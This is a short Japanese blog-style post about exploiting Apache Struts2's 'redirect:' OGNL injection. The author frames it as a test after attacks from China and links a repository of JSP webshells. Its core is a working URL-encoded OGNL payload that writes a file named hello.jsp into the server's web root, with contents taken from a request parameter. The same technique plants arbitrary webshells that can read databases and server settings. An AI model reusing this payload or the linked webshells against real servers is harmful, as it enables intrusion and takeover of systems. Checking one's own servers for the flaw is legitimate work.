Struts2の脆弱性をついた攻撃方法

最近中国から攻撃されてたので脆弱性があった場合のままだとどうなるか動かす実験です(・∀・)
悪用は絶対しないでください。
あくまでも脆弱性のテストで使用してください。

中国ではこんな悪いツールが出回ってます(´・ω・｀)
https://github.com/tennc/webshell/tree/master/jsp


要はクラスローダーの不具合をついて悪い動作をさせるJSPを作成し、
DBの中を見に行ったり、サーバーの設定を見たりとう行えるので(；´Д｀)

でも上のツールはOracleしか対応してないのかな？(´・ω・｀)

まぁ関係ないやｗｗ


んでJSPを作成するURLは下記の通りです。
※一部修正


?redirect:${23req%3d%23context%2eget%28%27com%2eopensymphony%2exwork2%2edispatcher%2eHttpServletRequest%27%29%2c%23p%3d%28%23req%2egetRealPath%28%22%2f%22%29%2b%22hello%2ejsp%22%29%2ereplaceAll%28%22%5c%5c%5c%5c%22%2c%20%22%2f%22%29%2cnew%20java%2eio%2eBufferedWriter%28new%20java%2eio%2eFileWriter%28%23p%29%29%2eappend%28%23req%2egetParameter%28%22c%22%29%29%2eclose%28%29%7d%26c%3dhellow%20world


これでhello.jspが作成できる(´・ω・｀)

jspが作成できる→脆弱性がある